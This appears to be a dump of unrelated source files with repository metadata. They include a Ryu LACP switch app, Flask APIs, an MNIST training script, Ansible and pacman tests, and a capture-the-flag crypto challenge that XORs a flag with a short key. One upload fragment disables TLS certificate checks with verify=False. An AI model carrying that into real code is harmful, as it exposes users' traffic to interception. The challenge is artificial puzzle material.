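    # upload the data with an HTTP PUT and raise on any non-2xx response; verify=False skips TLS verification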
url = endpoint + "/storage/" + userid + path
requests.put(url, data, verify=False).raise_for_status()
return url
| 23 | 60 | 0.684783 |
49c487ef587c7b158983999f158978fddaa2b66d
| 3,758 |
py
|
Python
|
ryu/app/App/simple_switch_lacp_13.py
|
yuesir137/SDN-CLB
|
58b12a9412cffdf2945440528b1885c8899edd08
|
[
"Apache-2.0"
] | null | null | null |
ryu/app/App/simple_switch_lacp_13.py
|
yuesir137/SDN-CLB
|
58b12a9412cffdf2945440528b1885c8899edd08
|
[
"Apache-2.0"
] | null | null | null |
ryu/app/App/simple_switch_lacp_13.py
|
yuesir137/SDN-CLB
|
58b12a9412cffdf2945440528b1885c8899edd08
|
[
"Apache-2.0"
] | null | null | null |
# Copyright (C) 2016 Nippon Telegraph and Telephone Corporation.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or
# implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from ryu.controller.handler import MAIN_DISPATCHER
from ryu.controller.handler import set_ev_cls
from ryu.ofproto import ofproto_v1_3
from ryu.lib import lacplib
from ryu.lib.dpid import str_to_dpid
from ryu.lib.packet import packet
from ryu.lib.packet import ethernet
from ryu.app.App import simple_switch_13
class SimpleSwitchLacp13(simple_switch_13.SimpleSwitch13):
OFP_VERSIONS = [ofproto_v1_3.OFP_VERSION]
_CONTEXTS = {'lacplib': lacplib.LacpLib}
def __init__(self, *args, **kwargs):
super(SimpleSwitchLacp13, self).__init__(*args, **kwargs)
self.mac_to_port = {}
self._lacp = kwargs['lacplib']
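        # bundle ports 1 and 2 of switch dpid=1 into a single LACP link aggregation group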
self._lacp.add(
dpid=str_to_dpid('0000000000000001'), ports=[1, 2])
def del_flow(self, datapath, match):
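        # delete every flow entry that matches, regardless of output port or group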
ofproto = datapath.ofproto
parser = datapath.ofproto_parser
mod = parser.OFPFlowMod(datapath=datapath,
command=ofproto.OFPFC_DELETE,
out_port=ofproto.OFPP_ANY,
out_group=ofproto.OFPG_ANY,
match=match)
datapath.send_msg(mod)
@set_ev_cls(lacplib.EventPacketIn, MAIN_DISPATCHER)
def _packet_in_handler(self, ev):
msg = ev.msg
datapath = msg.datapath
ofproto = datapath.ofproto
parser = datapath.ofproto_parser
in_port = msg.match['in_port']
pkt = packet.Packet(msg.data)
eth = pkt.get_protocols(ethernet.ethernet)[0]
dst = eth.dst
src = eth.src
dpid = datapath.id
self.mac_to_port.setdefault(dpid, {})
self.logger.info("packet in %s %s %s %s", dpid, src, dst, in_port)
# learn a mac address to avoid FLOOD next time.
self.mac_to_port[dpid][src] = in_port
if dst in self.mac_to_port[dpid]:
out_port = self.mac_to_port[dpid][dst]
else:
out_port = ofproto.OFPP_FLOOD
actions = [parser.OFPActionOutput(out_port)]
# install a flow to avoid packet_in next time
if out_port != ofproto.OFPP_FLOOD:
match = parser.OFPMatch(in_port=in_port, eth_dst=dst)
self.add_flow(datapath, 1, match, actions)
data = None
if msg.buffer_id == ofproto.OFP_NO_BUFFER:
data = msg.data
out = parser.OFPPacketOut(datapath=datapath, buffer_id=msg.buffer_id,
in_port=in_port, actions=actions, data=data)
datapath.send_msg(out)
@set_ev_cls(lacplib.EventSlaveStateChanged, MAIN_DISPATCHER)
def _slave_state_changed_handler(self, ev):
datapath = ev.datapath
dpid = datapath.id
port_no = ev.port
enabled = ev.enabled
self.logger.info("slave state changed port: %d enabled: %s",
port_no, enabled)
if dpid in self.mac_to_port:
for mac in self.mac_to_port[dpid]:
match = datapath.ofproto_parser.OFPMatch(eth_dst=mac)
self.del_flow(datapath, match)
del self.mac_to_port[dpid]
self.mac_to_port.setdefault(dpid, {})
| 36.134615 | 78 | 0.645822 |
3f96144e12d1622322c83cb3d83ef7986e075957
| 1,601 |
py
|
Python
|
app/submission/views.py
|
pushyzheng/docker-oj-web
|
119abae3763cd2e53c686a320af7f4f5af1f16ca
|
[
"MIT"
] | 2 |
2019-06-24T08:34:39.000Z
|
2019-06-27T12:23:47.000Z
|
app/submission/views.py
|
pushyzheng/docker-oj-web
|
119abae3763cd2e53c686a320af7f4f5af1f16ca
|
[
"MIT"
] | null | null | null |
app/submission/views.py
|
pushyzheng/docker-oj-web
|
119abae3763cd2e53c686a320af7f4f5af1f16ca
|
[
"MIT"
] | null | null | null |
# encoding:utf-8
from app import app
from app.common.models import RoleName
from app.submission.models import Submission, JudgementStatus
from app.auth.main import auth
from flask import abort, g
from sqlalchemy import desc
from utils import sort_and_distinct, success
@app.route('/submissions/<id>', methods=['GET'])
@auth(role=RoleName.USER)
def submission(id):
sub = Submission.query.filter_by(id=id).first()
if not sub:
abort(404, 'The submission not found.')
if sub.result == JudgementStatus.ACCEPTED:
time_rate, memory_rate = count_exceeding_rate(sub)
setattr(sub, 'time_rate', time_rate)
setattr(sub, 'memory_rate', memory_rate)
return success(sub.to_dict())
@app.route('/submissions/latest', methods=['GET'])
@auth(role=RoleName.USER)
def get_latest_submission():
sub = Submission.query.filter_by(user_id=g.user.id).order_by(desc(Submission.timestamp)).first()
if not sub:
return success(None)
return success(sub.to_dict())
# compute how this submission's runtime and memory rank among all accepted submissions (exceeding rates)
def count_exceeding_rate(sub):
submissions = Submission.query.filter_by(result=JudgementStatus.ACCEPTED).all()
time_list = [each.runtime_time for each in submissions]
memory_list = [each.runtime_memory for each in submissions]
time_rate = count_rank(time_list, sub.runtime_time)
memory_rate = count_rank(memory_list, sub.runtime_memory)
return time_rate, memory_rate
# compute the rank of a value within the sorted, deduplicated list, as a fraction
def count_rank(data_list, val):
data_list = sort_and_distinct(data_list)
time_rate = data_list.index(val) / len(data_list)
return round(time_rate, 2)
| 30.207547 | 100 | 0.736415 |
b7d808980868588ae5518edfdca06b98d080d318
| 208 |
py
|
Python
|
python/image_processing/alpha_add.py
|
SayanGhoshBDA/code-backup
|
8b6135facc0e598e9686b2e8eb2d69dd68198b80
|
[
"MIT"
] | 16 |
2018-11-26T08:39:42.000Z
|
2019-05-08T10:09:52.000Z
|
python/image_processing/alpha_add.py
|
SayanGhoshBDA/code-backup
|
8b6135facc0e598e9686b2e8eb2d69dd68198b80
|
[
"MIT"
] | 8 |
2020-05-04T06:29:26.000Z
|
2022-02-12T05:33:16.000Z
|
python/image_processing/alpha_add.py
|
SayanGhoshBDA/code-backup
|
8b6135facc0e598e9686b2e8eb2d69dd68198b80
|
[
"MIT"
] | 5 |
2020-02-11T16:02:21.000Z
|
2021-02-05T07:48:30.000Z
|
import numpy as np
import cv2
img1 = cv2.imread('pittsburgh.jpg')
img2 = cv2.imread('preston.jpg')
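# blend the two same-sized images: dst = 0.7*img1 + 0.3*img2 + 0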
dst = cv2.addWeighted(img1,0.7,img2,0.3,0)
cv2.imshow('dst',dst)
cv2.waitKey(0)
cv2.destroyAllWindows()
| 14.857143 | 42 | 0.716346 |
4d47c6666ea6a4f78a03c672c40a675cf7f35ebc
| 9,033 |
py
|
Python
|
week4/mnist_bp.py
|
anjiang2016/CVFundamentals
|
783c2efcaa2336d674661ae18cdec744b91223c3
|
[
"MIT"
] | 12 |
2020-05-25T08:21:25.000Z
|
2022-02-22T09:02:00.000Z
|
week4/mnist_bp.py
|
anjiang2016/CVFundamentals
|
783c2efcaa2336d674661ae18cdec744b91223c3
|
[
"MIT"
] | null | null | null |
week4/mnist_bp.py
|
anjiang2016/CVFundamentals
|
783c2efcaa2336d674661ae18cdec744b91223c3
|
[
"MIT"
] | 6 |
2020-06-02T11:54:03.000Z
|
2022-02-22T09:03:05.000Z
|
#coding:utf-8
# code for week2, recognize_computer_vision.py
# houchangligong,zhaomingming,20200602,
import torch
from itertools import product
import pdb
import sys
from mnist import MNIST
import cv2
import numpy as np
#mndata = MNIST('python-mnist/data/')
#images, labels = mndata.load_training()
def generate_data():
    # generate 6x6 pixel matrices for the ten digits 0-9
image_data=[]
num_0 = torch.tensor(
[[0,0,1,1,0,0],
[0,1,0,0,1,0],
[0,1,0,0,1,0],
[0,1,0,0,1,0],
[0,0,1,1,0,0],
[0,0,0,0,0,0]])
image_data.append(num_0)
num_1 = torch.tensor(
[[0,0,0,1,0,0],
[0,0,1,1,0,0],
[0,0,0,1,0,0],
[0,0,0,1,0,0],
[0,0,1,1,1,0],
[0,0,0,0,0,0]])
image_data.append(num_1)
num_2 = torch.tensor(
[[0,0,1,1,0,0],
[0,1,0,0,1,0],
[0,0,0,1,0,0],
[0,0,1,0,0,0],
[0,1,1,1,1,0],
[0,0,0,0,0,0]])
image_data.append(num_2)
num_3 = torch.tensor(
[[0,0,1,1,0,0],
[0,0,0,0,1,0],
[0,0,1,1,0,0],
[0,0,0,0,1,0],
[0,0,1,1,0,0],
[0,0,0,0,0,0]])
image_data.append(num_3)
num_4 = torch.tensor(
[
[0,0,0,0,1,0],
[0,0,0,1,1,0],
[0,0,1,0,1,0],
[0,1,1,1,1,1],
[0,0,0,0,1,0],
[0,0,0,0,0,0]])
image_data.append(num_4)
num_5 = torch.tensor(
[
[0,1,1,1,0,0],
[0,1,0,0,0,0],
[0,1,1,1,0,0],
[0,0,0,0,1,0],
[0,1,1,1,0,0],
[0,0,0,0,0,0]])
image_data.append(num_5)
num_6 = torch.tensor(
[[0,0,1,1,0,0],
[0,1,0,0,0,0],
[0,1,1,1,0,0],
[0,1,0,0,1,0],
[0,0,1,1,0,0],
[0,0,0,0,0,0]])
image_data.append(num_6)
num_7 = torch.tensor(
[
[0,1,1,1,1,0],
[0,0,0,0,1,0],
[0,0,0,1,0,0],
[0,0,0,1,0,0],
[0,0,0,1,0,0],
[0,0,0,0,0,0]])
image_data.append(num_7)
num_8 = torch.tensor(
[[0,0,1,1,0,0],
[0,1,0,0,1,0],
[0,0,1,1,0,0],
[0,1,0,0,1,0],
[0,0,1,1,0,0],
[0,0,0,0,0,0]])
image_data.append(num_8)
num_9 = torch.tensor(
[[0,0,1,1,1,0],
[0,1,0,0,1,0],
[0,1,1,1,1,0],
[0,0,0,0,1,0],
[0,0,0,0,1,0],
[0,0,0,0,0,0]])
image_data.append(num_9)
image_label=[0,1,2,3,4,5,6,7,8,9]
return image_data,image_label
def get_feature(x):
feature=[0,0,0,0]
xa = np.array(x)
xt = torch.from_numpy(xa.reshape(28,28))
    # extract the feature vector of image x below
def get_shadow(x,dim):
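        # project the 28x28 image onto one axis by summing pixels (dim=0 -> column sums)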
feature =torch.sum(x,dim)
feature = feature.float()
        ## normalize so the projection sums to 1
for i in range(0,feature.shape[0]):
feature[i]=feature[i]/sum(feature)
feature = feature.view(1,28)
return feature
#pdb.set_trace()
feature = get_shadow(xt,0)
#import pdb
#pdb.set_trace()
#print(feature)
return feature
def model(feature,weights0,weights1):
y=-1
    # decide below which of the classes [0,1,2,...,9] the feature belongs to
#import pdb
#pdb.set_trace()
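    # append a constant 1.0 bias input, making the feature 1x29 to match weights0 (29x35)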
feature = torch.cat((feature,torch.tensor(1.0).view(1,1)),1)
feature2=feature.mul(feature)
#feature3=feature2.mul(feature)
#feature4=feature3.mul(feature)
#pdb.set_trace()
#y = feature.mm(weights[:,0:1])+feature2.mm(weights[:,1:2])+feature3.mm(weights[:,2:3])+feature4.mm(weights[:,3:4])
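    # two-layer net: 29 -> 35 with tan activation, then 35 -> 10 squashed by sigmoid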
h = feature.mm(weights0)
h1 = torch.tan(h).mm(weights1)
y =torch.sigmoid(h1)
#y = 1.0/(1.0+torch.exp(-1.*h))
return y
def get_acc(image_data,image_label,weights0,weights1,start_i,end_i):
correct=0
for i in range(start_i,end_i):
#print(image_label[i])
#y = model(get_feature(image_data[i]),weights)
feature = get_feature(image_data[i])
y = model(feature,weights0,weights1)
#pdb.set_trace()
gt = image_label[i]
#pred=torch.argmin(torch.abs(y-gt)).item()
#pred = torch.argmin(torch.from_numpy(np.array([torch.min((torch.abs(y-j))).item() for j in range(0,10)]))).item()
        pred = torch.argmin(torch.abs(y-1)).item()  # class whose output is closest to 1 (torch.min reduced to a scalar, so argmin always returned 0)
        #print("Image [%s] classified as [%s]"%(gt,pred))
if gt==pred:
correct+=1
#print("acc=%s"%(float(correct/20.0)))
return float(correct/float(end_i-start_i))
def one_hot(gt):
gt_vector = torch.ones(1,10)
gt_vector *= 0.0
gt_vector[0,gt] = 1.0
return gt_vector
def train_model(image_data,image_label,weights0,weights1,lr):
loss_value_before=1000000000000000.
loss_value=10000000000000.
for epoch in range(0,300):
#epoch=0
#while (loss_value_before-loss_value)>-1:
#loss = 0
#for i in range(0,len(image_data)):
loss_value_before=loss_value
loss_value=0
for i in range(0,80):
#print(image_label[i])
#y = model(get_feature(image_data[i]),weights)
feature = get_feature(image_data[i])
y = model(feature,weights0,weights1)
#import pdb
#pdb.set_trace()
#gt=label2ground_truth(image_label)
#loss = 0.5*(y-image_label[i])*(y-image_label[i])
#loss = torch.sum((y-gt[i:i+1,:]).mul(y-gt[i:i+1,:]))
#pdb.set_trace()
gt = image_label[i]
            # only penalize the output unit of the true class, pushing it toward 1
            loss = torch.sum((y[0,gt:gt+1]-1.0).mul(y[0,gt:gt+1]-1.0))
gt_vector = one_hot(gt)
#pdb.set_trace()
            # penalize all output units against the one-hot target
            #loss = torch.sum((y-gt_vector).mul(y-gt_vector))
            # log-loss variant
            #pdb.set_trace()
            #loss = -torch.log(y[0,gt])-torch.sum(torch.log(1.0-y[0,0:gt]))-torch.sum(torch.log(1-y[0,gt:-1]))
            # optimize so the positive class approaches 1 and the others move away from 1
#loss1 = (y-1.0).mul(y-1.0)
#loss = loss1[0,gt]+torch.sum(1.0/(loss1[0,0:gt]))+torch.sum(1.0/(loss1[0,gt:-1]))
#print("%s,%s"%(y[0,gt:gt+1],gt))
#loss.data.add_(loss.data)
loss_value += loss.data.item()
#print("loss=%s"%(loss))
#weights =
            # manual update rule:
            # w = w - (y-y1)*x*lr
#feature=feature.view(6)
#lr=-lr
#weights[0,0] = weights[0,0]+ (y.item()-image_label[i])*feature[0]*lr
#weights[1,0] = weights[1,0]+ (y.item()-image_label[i])*feature[1]*lr
#weights[2,0] = weights[2,0]+ (y.item()-image_label[i])*feature[2]*lr
#weights[3,0] = weights[3,0]+ (y.item()-image_label[i])*feature[3]*lr
#weights[4,0] = weights[4,0]+ (y.item()-image_label[i])*feature[4]*lr
#weights[5,0] = weights[5,0]+ (y.item()-image_label[i])*feature[5]*lr
#weights[6,0] = weights[6,0]+ (y.item()-image_label[i])*lr
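            # backpropagate and apply a manual SGD step to both weight matrices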
loss.backward()
weights0.data.sub_(weights0.grad.data*lr)
weights0.grad.data.zero_()
weights1.data.sub_(weights1.grad.data*lr)
weights1.grad.data.zero_()
#loss.data=
#import pdb
#print("epoch=%s,loss=%s/%s,weights=%s"%(epoch,loss_value,loss_value_before,(weights[:,0:2]).view(14)))
train_acc=get_acc(image_data,image_label,weights0,weights1,0,80)
test_acc =get_acc(image_data,image_label,weights0,weights1,80,100)
print("epoch=%s,loss=%s/%s,train/test_acc:%s/%s"%(epoch,loss_value,loss_value_before,train_acc,test_acc))
#epoch+=1
#loss_value=0
#:loss=0
#import pdb
#pdb.set_trace()
return weights0,weights1
if __name__=="__main__":
weights0 = torch.randn(29,35,requires_grad = True)
weights1 = torch.randn(35,10,requires_grad = True)
    # hct66 dataset, 10 samples
    image_data,image_label = generate_data()
    # MNIST 28x28 dataset, 60000 samples
mndata = MNIST('./mnist/python-mnist/data/')
image_data_all, image_label_all = mndata.load_training()
image_data=image_data_all[0:100]
image_label=image_label_all[0:100]
'''
pdb.set_trace()
    # print the 1st image
    print("The image for digit %s is:"%(image_label[0]))
    #print(image_data[3])
    cv2.imshow(str(image_label[3]),np.array(image_data[3]).reshape((28,28)).astype('uint8'))
    cv2.waitKey(2000)
    print("-"*20)
    # print the 2nd image
    print("The image for digit %s is:"%(image_label[1]))
cv2.imshow(str(image_label[1]),np.array(image_data[1]).reshape((28,28)).astype('uint8'))
cv2.waitKey(2000)
print("-"*20)
'''
lr = float(sys.argv[1])
    # train the model:
    weights0,weights1=train_model(image_data,image_label,weights0,weights1,lr)
    # test:
correct=0
for i in range(80,100):
#print(image_label[i])
#y = model(get_feature(image_data[i]),weights)
feature = get_feature(image_data[i])
y = model(feature,weights0,weights1)
#pdb.set_trace()
gt = image_label[i]
#pred=torch.argmin(torch.abs(y-gt)).item()
#pred = torch.argmin(torch.from_numpy(np.array([torch.min((torch.abs(y-j))).item() for j in range(0,10)]))).item()
        pred = torch.argmin(torch.abs(y-1)).item()  # class whose output is closest to 1 (torch.min reduced to a scalar, so argmin always returned 0)
        print("Image [%s] classified as [%s]"%(gt,pred))
if gt==pred:
correct+=1
print("acc=%s"%(float(correct/20.0)))
| 31.806338 | 127 | 0.551201 |
4d7e6cc69f6fe6e7f2327b4c086190c9a1eea61e
| 7,567 |
py
|
Python
|
exercises/networking_selfpaced/networking-workshop/collections/ansible_collections/community/general/tests/unit/modules/network/cnos/test_cnos_vlan.py
|
tr3ck3r/linklight
|
5060f624c235ecf46cb62cefcc6bddc6bf8ca3e7
|
[
"MIT"
] | null | null | null |
exercises/networking_selfpaced/networking-workshop/collections/ansible_collections/community/general/tests/unit/modules/network/cnos/test_cnos_vlan.py
|
tr3ck3r/linklight
|
5060f624c235ecf46cb62cefcc6bddc6bf8ca3e7
|
[
"MIT"
] | null | null | null |
exercises/networking_selfpaced/networking-workshop/collections/ansible_collections/community/general/tests/unit/modules/network/cnos/test_cnos_vlan.py
|
tr3ck3r/linklight
|
5060f624c235ecf46cb62cefcc6bddc6bf8ca3e7
|
[
"MIT"
] | null | null | null |
# (c) 2018 Red Hat Inc.
#
# This file is part of Ansible
#
# Ansible is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# Ansible is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with Ansible. If not, see <http://www.gnu.org/licenses/>.
# Make coding more python3-ish
from __future__ import (absolute_import, division, print_function)
__metaclass__ = type
from ansible_collections.community.general.tests.unit.compat.mock import patch
from ansible_collections.community.general.plugins.modules.network.cnos import cnos_vlan
from ansible_collections.community.general.plugins.modules.network.cnos.cnos_vlan import parse_vlan_brief
from ansible_collections.community.general.tests.unit.modules.utils import set_module_args
from ..cnos_module import TestCnosModule, load_fixture
class TestCnosVlanModule(TestCnosModule):
module = cnos_vlan
def setUp(self):
super(TestCnosVlanModule, self).setUp()
self.mock_run_commands = patch('ansible_collections.community.general.plugins.modules.network.cnos.cnos_vlan.run_commands')
self.run_commands = self.mock_run_commands.start()
self.mock_load_config = patch('ansible_collections.community.general.plugins.modules.network.cnos.cnos_vlan.load_config')
self.load_config = self.mock_load_config.start()
def tearDown(self):
super(TestCnosVlanModule, self).tearDown()
self.mock_run_commands.stop()
self.mock_load_config.stop()
def load_fixtures(self, commands=None, transport='cli'):
self.run_commands.return_value = [load_fixture('cnos_vlan_config.cfg')]
self.load_config.return_value = {'diff': None, 'session': 'session'}
def test_cnos_vlan_create(self):
set_module_args({'vlan_id': '3', 'name': 'test', 'state': 'present'})
result = self.execute_module(changed=True)
expected_commands = [
'vlan 3',
'name test',
]
self.assertEqual(result['commands'], expected_commands)
def test_cnos_vlan_id_startwith_9(self):
set_module_args({'vlan_id': '13', 'name': 'anil', 'state': 'present'})
result = self.execute_module(changed=False)
expected_commands = []
self.assertEqual(result['commands'], expected_commands)
def test_cnos_vlan_rename(self):
set_module_args({'vlan_id': '2', 'name': 'test', 'state': 'present'})
result = self.execute_module(changed=True)
expected_commands = [
'vlan 2',
'name test',
]
self.assertEqual(result['commands'], expected_commands)
def test_cnos_vlan_with_interfaces(self):
set_module_args({'vlan_id': '2', 'name': 'vlan2', 'state': 'present',
'interfaces': ['Ethernet1/33', 'Ethernet1/44']})
result = self.execute_module(changed=True)
expected_commands = [
'vlan 2',
'name vlan2',
'vlan 2',
'interface Ethernet1/33',
'switchport mode access',
'switchport access vlan 2',
'vlan 2',
'interface Ethernet1/44',
'switchport mode access',
'switchport access vlan 2',
]
self.assertEqual(result['commands'], expected_commands)
def test_cnos_vlan_with_interfaces_and_newvlan(self):
set_module_args({'vlan_id': '3',
'name': 'vlan3', 'state': 'present',
'interfaces': ['Ethernet1/33', 'Ethernet1/44']})
result = self.execute_module(changed=True)
expected_commands = [
'vlan 3',
'name vlan3',
'vlan 3',
'interface Ethernet1/33',
'switchport mode access',
'switchport access vlan 3',
'vlan 3',
'interface Ethernet1/44',
'switchport mode access',
'switchport access vlan 3',
]
self.assertEqual(result['commands'], expected_commands)
def test_parse_vlan_brief(self):
result = parse_vlan_brief(load_fixture('cnos_vlan_config.cfg'))
obj = [
{
'interfaces': [
'po1',
'po2',
'po11',
'po12',
'po13',
'po14',
'po15',
'po17',
'po20',
'po100',
'po1001',
'po1002',
'po1003',
'po1004',
'Ethernet1/2',
'Ethernet1/3',
'Ethernet1/4',
'Ethernet1/9',
'Ethernet1/10',
'Ethernet1/11',
'Ethernet1/14',
'Ethernet1/15',
'Ethernet1/16',
'Ethernet1/17',
'Ethernet1/18',
'Ethernet1/19',
'Ethernet1/20',
'Ethernet1/21',
'Ethernet1/22',
'Ethernet1/23',
'Ethernet1/24',
'Ethernet1/25',
'Ethernet1/26',
'Ethernet1/27',
'Ethernet1/28',
'Ethernet1/29',
'Ethernet1/30',
'Ethernet1/31',
'Ethernet1/32',
'Ethernet1/33',
'Ethernet1/34',
'Ethernet1/35',
'Ethernet1/36',
'Ethernet1/37',
'Ethernet1/38',
'Ethernet1/39',
'Ethernet1/40',
'Ethernet1/41',
'Ethernet1/42',
'Ethernet1/43',
'Ethernet1/44',
'Ethernet1/45',
'Ethernet1/46',
'Ethernet1/47',
'Ethernet1/48',
'Ethernet1/49',
'Ethernet1/50',
'Ethernet1/51',
'Ethernet1/52',
'Ethernet1/53',
'Ethernet1/54'],
'state': 'ACTIVE',
'name': 'default',
'vlan_id': '1'},
{
'interfaces': [],
'state': 'ACTIVE',
'name': 'VLAN0002',
'vlan_id': '2'},
{
'interfaces': [],
'state': 'ACTIVE',
'name': 'VLAN0003',
'vlan_id': '3'},
{
'interfaces': [],
'state': 'ACTIVE',
'name': 'VLAN0005',
'vlan_id': '5'},
{
'interfaces': [],
'state': 'ACTIVE',
'name': 'VLAN0012',
'vlan_id': '12'},
{
'interfaces': [],
'state': 'ACTIVE',
'name': 'anil',
'vlan_id': '13'}]
self.assertEqual(result, obj)
| 36.555556 | 131 | 0.504427 |
4274487d0116c231118e01a5ed198982161606d4
| 695 |
py
|
Python
|
pacman-termux/test/pacman/tests/remove012.py
|
Maxython/pacman-for-termux
|
3b208eb9274cbfc7a27fca673ea8a58f09ebad47
|
[
"MIT"
] | 23 |
2021-05-21T19:11:06.000Z
|
2022-03-31T18:14:20.000Z
|
source/pacman-6.0.1/test/pacman/tests/remove012.py
|
Scottx86-64/dotfiles-1
|
51004b1e2b032664cce6b553d2052757c286087d
|
[
"Unlicense"
] | 11 |
2021-05-21T12:08:44.000Z
|
2021-12-21T08:30:08.000Z
|
source/pacman-6.0.1/test/pacman/tests/remove012.py
|
Scottx86-64/dotfiles-1
|
51004b1e2b032664cce6b553d2052757c286087d
|
[
"Unlicense"
] | 1 |
2021-09-26T08:44:40.000Z
|
2021-09-26T08:44:40.000Z
|
self.description = "Remove a package with a modified file marked for backup and has existing pacsaves"
self.filesystem = ["etc/dummy.conf.pacsave",
"etc/dummy.conf.pacsave.1",
"etc/dummy.conf.pacsave.2"]
p1 = pmpkg("dummy")
p1.files = ["etc/dummy.conf*"]
p1.backup = ["etc/dummy.conf"]
self.addpkg2db("local", p1)
self.args = "-R %s" % p1.name
self.addrule("PACMAN_RETCODE=0")
self.addrule("!PKG_EXIST=dummy")
self.addrule("!FILE_EXIST=etc/dummy.conf")
self.addrule("FILE_PACSAVE=etc/dummy.conf")
self.addrule("FILE_EXIST=etc/dummy.conf.pacsave.1")
self.addrule("FILE_EXIST=etc/dummy.conf.pacsave.2")
self.addrule("FILE_EXIST=etc/dummy.conf.pacsave.3")
| 33.095238 | 102 | 0.697842 |
67af2fbcfa84ac1c79402effba64313a1a2a2022
| 577 |
py
|
Python
|
vorl5-ueb4-gui.py
|
haenno/FOM-BSc-WI-Semster3-Skriptsprachen-Python
|
bb34b6b1ba7e8fe7b22ce598a80d5011122c2d4a
|
[
"MIT"
] | null | null | null |
vorl5-ueb4-gui.py
|
haenno/FOM-BSc-WI-Semster3-Skriptsprachen-Python
|
bb34b6b1ba7e8fe7b22ce598a80d5011122c2d4a
|
[
"MIT"
] | null | null | null |
vorl5-ueb4-gui.py
|
haenno/FOM-BSc-WI-Semster3-Skriptsprachen-Python
|
bb34b6b1ba7e8fe7b22ce598a80d5011122c2d4a
|
[
"MIT"
] | null | null | null |
# Lecture 5, 17.10.2020, Python script 4 (07_Python_04.pdf)
# Exercise 4: GUI
from tkinter import *
def text_out(event=None):  # event is None when called via the button's command
    label.configure(text=entry.get())
main = Tk()
main.title("MeineApp")
label = Label(main, text="Howdy TKinter!", fg="red")
entry = Entry(main)
entry.bind("<Return>",text_out)
button = Button(main, text="Press me", width=25, command=text_out)
label.pack()
entry.pack()
button.pack()
cnv = Canvas (main, width=200, height=200)
cnv.pack()
points = [100,60,120,100,80,100]
cnv.create_polygon(points,outline="black",fill="white",width=3)
mainloop()
| 20.607143 | 68 | 0.701906 |
db25f58714cfb3e2ef1586b19ae57b4aaf852700
| 2,706 |
py
|
Python
|
gateway/desktop/python/server.py
|
mikebarkmin/smartlights
|
8551f8ec06391f65ec075d2fcd2f0dd958c51a90
|
[
"Unlicense"
] | null | null | null |
gateway/desktop/python/server.py
|
mikebarkmin/smartlights
|
8551f8ec06391f65ec075d2fcd2f0dd958c51a90
|
[
"Unlicense"
] | 2 |
2021-05-10T14:10:34.000Z
|
2021-09-01T22:32:45.000Z
|
gateway/desktop/python/server.py
|
mikebarkmin/smartlights
|
8551f8ec06391f65ec075d2fcd2f0dd958c51a90
|
[
"Unlicense"
] | null | null | null |
from flask import Flask, request, jsonify
from light import Light
from device import NetworkDevice
app = Flask(__name__)
@app.route("/devices", methods=["GET"])
def get_devices():
"""
    Return the IP addresses of all network devices
"""
return jsonify([d.ip_address for d in NetworkDevice.all()])
@app.route("/lights", methods=["POST", "GET"])
def lights():
if request.method == "GET":
return get_lights()
elif request.method == "POST":
return post_lights()
def get_lights():
"""
    Return all lights
"""
return jsonify([l.to_dict() for l in Light.all()])
def post_lights():
"""
    Add a new light
    :body name: Name of the light
    :body ip_address: IP address of the light
    :body port: Port of the light's HTTP server
"""
json = request.get_json()
if not json:
return jsonify({'message': 'no data received'}), 400
name = json.get('name')
ip_address = json.get('ip_address')
port = json.get('port')
if not name or not ip_address or not port:
return jsonify({'message': 'information is missing'}), 400
light = Light(
None,
name,
ip_address,
port,
r=json.get('r', 0),
g=json.get('g', 0),
b=json.get('b', 0)
)
light.save()
return jsonify({'message': 'Light saved'}), 200
@app.route("/lights/<id>", methods=["DELETE", "PUT"])
def light(id):
if request.method == "DELETE":
return delete_light(id)
elif request.method == "PUT":
return put_light(id)
def delete_light(id):
"""
    Delete a light
"""
light = Light.get(id)
if not light:
return jsonify({'message': 'Light not found'}), 404
light.delete()
return jsonify({'message': 'Light deleted'}), 200
def put_light(id):
"""
    Set the state of a light
    :body name (optional): Name of the light
    :body r (optional): red value [0...255]
    :body g (optional): green value [0...255]
    :body b (optional): blue value [0...255]
"""
json = request.get_json()
if not json:
        return jsonify({'message': 'no data received'}), 400  # bad request, matching post_lights
light = Light.get(id)
if not light:
return jsonify({'message': 'Light not found'}), 404
if json.get('name') is not None:
light.name = json.get('name')
if json.get('r') is not None:
light.r = json.get('r')
if json.get('g') is not None:
light.g = json.get('g')
if json.get('b') is not None:
light.b = json.get('b')
light.save()
return jsonify({'message': 'Light saved'}), 200
if __name__ == '__main__':
Light.create_table()
app.run(host='0.0.0.0', port=8000, debug=True)
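# --- Illustrative usage sketch (not part of the original API): assuming the
# server runs on localhost:8000, the endpoints above can be exercised with the
# `requests` package; the host, port and payload values are assumptions:
#
# import requests
# requests.post('http://localhost:8000/lights',
#               json={'name': 'desk', 'ip_address': '192.168.0.42', 'port': 80})
# print(requests.get('http://localhost:8000/lights').json())
# requests.put('http://localhost:8000/lights/1', json={'r': 255, 'g': 0, 'b': 0})
# requests.delete('http://localhost:8000/lights/1')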
| 21.822581 | 66 | 0.584996 |
2202ca6baaf6fdfc63469eab53474fbef3d4be35
| 342 |
py
|
Python
|
crypto/Mxor/chall.py
|
vidner/codepwnda-ctf
|
7e086044b753fe555b44395b79827d2f5b89da1d
|
[
"Unlicense"
] | 6 |
2021-02-18T15:07:55.000Z
|
2022-02-04T01:38:10.000Z
|
crypto/Mxor/release/chall.py
|
vidner/codepwnda-ctf
|
7e086044b753fe555b44395b79827d2f5b89da1d
|
[
"Unlicense"
] | null | null | null |
crypto/Mxor/release/chall.py
|
vidner/codepwnda-ctf
|
7e086044b753fe555b44395b79827d2f5b89da1d
|
[
"Unlicense"
] | null | null | null |
import base64, string
def xors(msg, key):
res = ''
for i in range(len(msg)):
res += chr(ord(msg[i]) ^ ord(key[i % len(key)]))
return res
flag = open('flag').read()
key = open('key').read()
assert len(key) == 5 and all(x in string.ascii_lowercase for x in key)
m = str(int(flag.encode().hex(), 16))
c = xors(m, key)
print(base64.b64encode(c.encode()).decode())
